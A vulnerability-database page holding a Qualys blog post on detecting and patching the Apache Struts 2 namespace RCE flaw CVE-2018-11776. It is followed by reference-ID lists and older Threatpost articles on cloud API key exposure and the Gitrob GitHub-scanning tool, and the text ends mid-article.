DATABASE RESOURCES PRICING ABOUT US

{"id": "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "type": "qualysblog", "bulletinFamily": "blog", "title": "Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776", "description": "A new remote code execution [vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-057>) in Apache Struts 2, CVE-2018-11776, was [disclosed](<https://semmle.com/news/apache-struts-CVE-2018-11776>) yesterday. While this vulnerability does not exist with a default configuration of Struts, it does exist in commonly seen configurations for some Struts plugins.\n\n**Update August 24, 2018**: A [dashboard for this vulnerability](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776>) is now available to download.\n\n### The Vulnerability\n\nStruts improperly validates namespaces, allowing for [OGNL](<https://en.wikipedia.org/wiki/OGNL>) injection, and can lead to full remote code execution on the target system. For a more detailed technical look at the vulnerability, please see our [Threat Protection blog](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/>) on this topic. Struts versions 2.3.34 and 2.5.16 and before are impacted.\n\n### Recommended Response\n\nDue to the ease of exploitation and relatively common configuration that is required, this vulnerability should be patched immediately for all applications that use Struts 2. Patched versions are Struts [2.3.35](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.35>) and [2.5.17](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.17>). A publicly available [PoC](<https://github.com/jas502n/St2-057/blob/master/README.md>) has already been published, and active attacks against this vulnerability are most likely imminent.\n\n### Detections\n\nVulnerabilities in application frameworks are challenging to programmatically detect with traditional VM scanning, and multiple methods of detection are needed to ensure that Struts is found.\n\nBecause of this, Qualys has implemented two QIDs for detecting CVE-2018-11776 in [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>):\n\n * **QID 13251** - This detection includes both remote and authenticated checks: \n * **Remote** - This detection sends a specifically crafted payload in the request to check for command execution in .action, .go, .do, .jsp and .xhtml files under common web directories.\n * **Authenticated (Linux/Unix)** - This executes ps -ef command, looks for the presence of the Tomcat process and finds the location of struts2-core-x.jar file. We are investigating using this method on other middleware technologies.\n * **QID 371151** - This authenticated scan detection uses our Tomcat auth to specify the location of the Tomcat configuration file. Once a Tomcat auth record is added, this detection reads the Tomcat location from the config and searches for struts-core.x.jar file under sub directories. It extracts the version from .jar file and compares with vulnerable Struts versions.\n * Both QIDs are included in Vulnerability Signatures version **VULNSIGS-2.4.403-3** or later\n\nQualys has also implemented a QID for detecting CVE-2018-11776 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-application-scanning/>):\n\n * **QID 150250** - This is an active detection within WAS that sends a specially-crafted payload to the scanned web application. A vulnerable application will show evidence of a command executing on the server and QID 150250 will be reported.\n\nIn addition to scanning, Qualys recommends that application frameworks such as Struts be documented in an Application Portfolio or CMDB to ensure all components of an application are recorded and can be audited for these kinds of vulnerabilities.\n\n### Protection\n\nEven prior to the disclosure of this RCE vulnerability, [Qualys Web Application Firewall](<https://www.qualys.com/apps/web-app-firewall/>) users were already protected from exploits by every possible out-of-the-box template and generic policy. These templates, developed by security experts for Qualys WAF programmable inspection engine, are constantly tested against latests threats for the best detection rate and least false-positives.\n\n\n\nCustomers using manual policies instead of templates were potentially not protected though, depending on ELI (Expression Language Injection), CI (Code Injection) and RCE (Remote Command Execution) sliders settings, along with the blocking threshold.\n\n\n\n\n\nMitigating CVE-2018-11776 is possible by using the following methods:\n\n * native protection using a **generic policy** (QID-226017: Expression Language Injection and QID-226008: Remote Command Execution)\n * for those using a manual policy instead of an out-of-the-box template, you can alternatively create a **custom rule** with the following condition: _request.path DETECT \"qid/150178\"_\n * or of course, by applying a **virtual patch** to QID-150250 from within the WAS module ; which is equivalent to creating the rule manually, but quicker.\n\nToday\u2019s example - like \"drupalgeddon2\" a few months ago (CVE-2018-7600) - demonstrates how blocking zero-days is possible with Qualys WAF, without needing to define manual rules, giving CISO and IT Security organizations time for implementing sustainable fixes, while providing them with a tool to monitor and report any attempt to exploit the vulnerability.", "published": "2018-08-23T20:27:19", "modified": "2018-08-23T20:27:19", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blog.qualys.com/securitylabs/2018/08/23/detecting-apache-struts-2-namespace-rce-cve-2018-11776", "reporter": "Jimmy Graham", "references": [], "cvelist": ["CVE-2018-11776", "CVE-2018-7600"], "lastseen": "2019-01-14T20:46:20", "viewCount": 2122, "enchantments": {"score": {"value": 1.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-7600"]}, {"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0192", "CPAI-2018-0849", "CPAI-2018-1697"]}, {"type": "cisco", "idList": ["CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cve", "idList": ["CVE-2018-11776", "CVE-2018-7600"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:426F0", "DEBIAN:DLA-1325-1:E895C", "DEBIAN:DSA-4156-1:C1814", "DEBIAN:DSA-4156-1:CE193"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639", "E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:45260", "EDB-ID:45367"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "EXPLOITPACK:9E300C1777BC1D8C514DB64FA7D000CE", "EXPLOITPACK:E563140BD918794B55F61FC55941120F"]}, {"type": "f5", "idList": ["F5:K22854260", "F5:K60499474"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:3F234602D69C", "FEDORA:45D79604B015", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "freebsd", "idList": ["A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65"]}, {"type": "githubexploit", "idList": ["0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "CD8CABD7-BE65-5434-B682-F73ABA737C65"]}, {"type": "hackerone", "idList": ["H1:1063256"]}, {"type": "hivepro", "idList": ["HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675"]}, {"type": "ibm", "idList": ["47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:5494076556436489947", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:8708017483803645203"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-", "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891264", "MYHACK58:62201891267", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700224.PRM", "700228.PRM", "700229.PRM", "700230.PRM", "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "DEBIAN_DLA-1325.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "DRUPAL_CVE-2018-7600_RCE.NBIN", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "STRUTS_2_5_17.NASL", "STRUTS_2_5_17_RCE.NASL", "WEB_APPLICATION_SCANNING_112727", "WEB_APPLICATION_SCANNING_98216", "WEB_APPLICATION_SCANNING_98564", "WEB_APPLICATION_SCANNING_98565", "WEB_APPLICATION_SCANNING_98566", "WEB_APPLICATION_SCANNING_98567", "WEB_APPLICATION_SCANNING_98568", "WEB_APPLICATION_SCANNING_98569", "WEB_APPLICATION_SCANNING_98570"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108438", "OPENVAS:1361412562310108792", "OPENVAS:1361412562310141028", "OPENVAS:1361412562310141029", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310812583", "OPENVAS:1361412562310812584", "OPENVAS:1361412562310813786", "OPENVAS:1361412562310814523", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2019", "ORACLE:CPUJAN2019-5072801", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2018-4428296"]}, {"type": "osv", "idList": ["OSV:DLA-1325-1", "OSV:DSA-4156-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776"]}, {"type": "saint", "idList": ["SAINT:17FB524069BA3CD18537B30C76190BF7", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "securelist", "idList": ["SECURELIST:35644FF079836082B5B728F8E95F0EDD"]}, {"type": "seebug", "idList": ["SSV:97207"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:4DE731C9D113C3993C96A773C079023F", "THN:72352D205E5586C5585536F8661A10E4", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F8EDB5227B5DA0E4B49064C2972A193D"]}, {"type": "threatpost", "idList": ["THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "THREATPOST:0FC293825070B81036932BDB41D793B5", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:E984089A4842B564B374B807AF915A44", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-11776", "UB:CVE-2018-7600"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdt", "idList": ["1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056"]}]}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0192", "CPAI-2018-0849", "CPAI-2018-1697"]}, {"type": "cisco", "idList": ["CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cve", "idList": ["CVE-2018-11776", "CVE-2018-7600"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:E895C", "DEBIAN:DSA-4156-1:C1814"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639"]}, {"type": "exploitdb", "idList": ["EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "EXPLOITPACK:643750D6FF631053256ACECA930FF041"]}, {"type": "f5", "idList": ["F5:K22854260"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:45D79604B015", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "freebsd", "idList": ["A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65"]}, {"type": "githubexploit", "idList": ["0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "hackerone", "idList": ["H1:1063256"]}, {"type": "ibm", "idList": ["B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E"]}, {"type": "kitploit", "idList": ["KITPLOIT:5494076556436489947"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_DRUPALGEDDON2"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891267", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1325.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "STRUTS_2_5_17.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704156", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310891325"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2020"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776"]}, {"type": "saint", "idList": ["SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "securelist", "idList": ["SECURELIST:35644FF079836082B5B728F8E95F0EDD"]}, {"type": "seebug", "idList": ["SSV:97207"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F8EDB5227B5DA0E4B49064C2972A193D"]}, {"type": "threatpost", "idList": ["THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-7600"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdt", "idList": ["1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-11776", "epss": "0.975560000", "percentile": "0.999920000", "modified": "2023-03-14"}, {"cve": "CVE-2018-7600", "epss": "0.975790000", "percentile": "0.999980000", "modified": "2023-03-14"}], "vulnersScore": 1.8}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1683995507, "epss": 1678865708}, "_internal": {"score_hash": "744d8979c05c9e43f35727ddbd093f31"}}

{"threatpost": [{"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. [Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n> OSINT #Gitrob mines GitHub for sensitive information that isn\u2019t meant for public consumption.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgitrob-combs-github-repositories-for-secret-company-data%2F110380%2F&text=OSINT+%23Gitrob+mines+GitHub+for+sensitive+information+that+isn%26%238217%3Bt+meant+for+public+consumption.>)\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. \u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 